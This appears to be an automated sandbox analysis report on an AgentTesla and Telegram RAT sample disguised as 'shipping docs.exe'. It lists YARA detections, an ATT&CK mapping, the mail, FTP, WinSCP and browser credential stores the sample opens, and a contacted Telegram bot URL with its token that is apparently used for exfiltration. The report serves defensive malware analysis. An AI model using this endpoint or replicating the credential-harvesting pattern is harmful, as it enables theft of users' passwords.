Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Users\user\Desktop\shipping docs.exe VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\shipping docs.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\CustomMarshalers\v4.0_4.0.0.0__b03f5f7f11d50a3a\CustomMarshalers.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation

Source: C:\Users\user\Desktop\shipping docs.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Yara detected Telegram RAT

Source: Yara match	File source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR

Tries to steal Mail credentials (via file / registry access)

Source: C:\Users\user\Desktop\shipping docs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\shipping docs.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\shipping docs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\Desktop\shipping docs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: C:\Users\user\Desktop\shipping docs.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions

Tries to harvest and steal ftp login credentials

Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	File opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\Favorites\Quick Connect\
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	File opened: C:\Users\user\AppData\Roaming\FileZilla\recentservers.xml

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Source: Yara match	File source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR

Remote Access Functionality

Yara detected Telegram RAT

Source: Yara match	File source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR

Yara detected AgentTesla

Source: Yara match	File source: 3.0.shipping docs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipping docs.exe.35d2730.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.shipping docs.exe.35d2730.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000000.00000002.270616747.00000000034A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000000.262419819.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: shipping docs.exe PID: 2400, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: shipping docs.exe PID: 3776, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: yVGAJfiVEvtg.exe PID: 3680, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: VMqTMMD.exe PID: 5228, type: MEMORYSTR

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	211 Windows Management Instrumentation	1 Scheduled Task/Job	111 Process Injection	1 Disable or Modify Tools	2 OS Credential Dumping	1 File and Directory Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	1 Scheduled Task/Job	1 Registry Run Keys / Startup Folder	1 Scheduled Task/Job	1 Deobfuscate/Decode Files or Information	1 Input Capture	114 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	Exfiltration Over Bluetooth	11 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	1 Registry Run Keys / Startup Folder	2 Obfuscated Files or Information	1 Credentials in Registry	1 Query Registry	SMB/Windows Admin Shares	1 Email Collection	Automated Exfiltration	2 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	3 Software Packing	NTDS	311 Security Software Discovery	Distributed Component Object Model	1 Input Capture	Scheduled Transfer	3 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	1 Masquerading	LSA Secrets	1 Process Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	131 Virtualization/Sandbox Evasion	Cached Domain Credentials	131 Virtualization/Sandbox Evasion	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	111 Process Injection	DCSync	1 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	1 Hidden Files and Directories	Proc Filesystem	1 Remote System Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
shipping docs.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
shipping docs.exe	47%	Virustotal		Browse
shipping docs.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Roaming\VMqTMMD\VMqTMMD.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla
C:\Users\user\AppData\Roaming\yVGAJfiVEvtg.exe	73%	ReversingLabs	ByteCode-MSIL.Trojan.AgentTesla

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
3.0.shipping docs.exe.400000.0.unpack	100%	Avira	TR/Spy.Gen8		Download File

Domains

Source	Detection	Scanner	Label	Link
c-0001.c-msedge.net	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://127.0.0.1:HTTP/1.1	0%	Avira URL Cloud	safe
http://www.fontbureau.comgrita	0%	URL Reputation	safe
http://www.s.$	0%	Avira URL Cloud	safe
https://api.telegram.org4	0%	URL Reputation	safe
https://api.telegram.org4	0%	URL Reputation	safe
http://DynDns.comDynDNSnamejidpasswordPsi/Psi	0%	URL Reputation	safe
http://www.sajatypeworks.comteP$	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/O	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/$	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/Y	0%	URL Reputation	safe
https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.ziphttps://www	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/jp/	0%	URL Reputation	safe
http://en.w	0%	URL Reputation	safe
https://JIQ1JKgQReGyOBe.com	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/=	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn/	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.fontbureau.comm	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.founder.com.cn/cnu-h	0%	URL Reputation	safe
http://www.fonts.com8	0%	URL Reputation	safe
http://www.founder.com.cn/cn%	0%	URL Reputation	safe
http://www.sandoll.co.krT	0%	Avira URL Cloud	safe
http://www.sandoll.co.krigh	0%	Avira URL Cloud	safe
http://Unbjpy.com	0%	Avira URL Cloud	safe
http://www.fonts.comtteJ	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnlJ	0%	Avira URL Cloud	safe
http://www.jiyu-kobo.co.jp/ko	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
c-0001.c-msedge.net	13.107.4.50	true	false	0%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	false		high

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
https://api.telegram.org/bot5676971476:AAFdGsXW8kwzXNIluAGV-a4sJ2XBy68O9WI/sendDocument	false		high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://127.0.0.1:HTTP/1.1	shipping docs.exe, 00000003.00000002.518422910.0000000002FA1000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.520653491.00000000030C1000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.518773451.0000000002E61000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.fontbureau.com/designersG	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers/?	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.founder.com.cn/cn/bThe	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe URL Reputation: safe	unknown
https://api.telegram.org	shipping docs.exe, 00000003.00000002.534292549.0000000003336000.00000004.00000800.00020000.00000000.sdmp, yVGAJfiVEvtg.exe, 00000012.00000002.537543749.000000000349A000.00000004.00000800.00020000.00000000.sdmp, VMqTMMD.exe, 00000015.00000002.534577687.00000000031EE000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.fontbureau.com/designers?	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.s.$	shipping docs.exe, 00000000.00000003.239908062.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240179699.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240220486.0000000005493000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.239881609.0000000005491000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240113755.0000000005493000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	low
http://www.tiro.com	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240459510.000000000548B000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.240423951.000000000548B000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.fontbureau.com/designers	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.245303030.0000000005479000.00000004.00000800.00020000.00000000.sdmp, shipping docs.exe, 00000000.00000003.245545950.000000000547D000.00000004.00000800.00020000.00000000.sdmp	false		high
http://www.goodfont.co.kr	shipping docs.exe, 00000000.00000002.279908957.0000000006732000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.carterandcone.com	shipping docs.exe, 00000000.00000003.242487064.0000000005480000.00000004.00000800.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
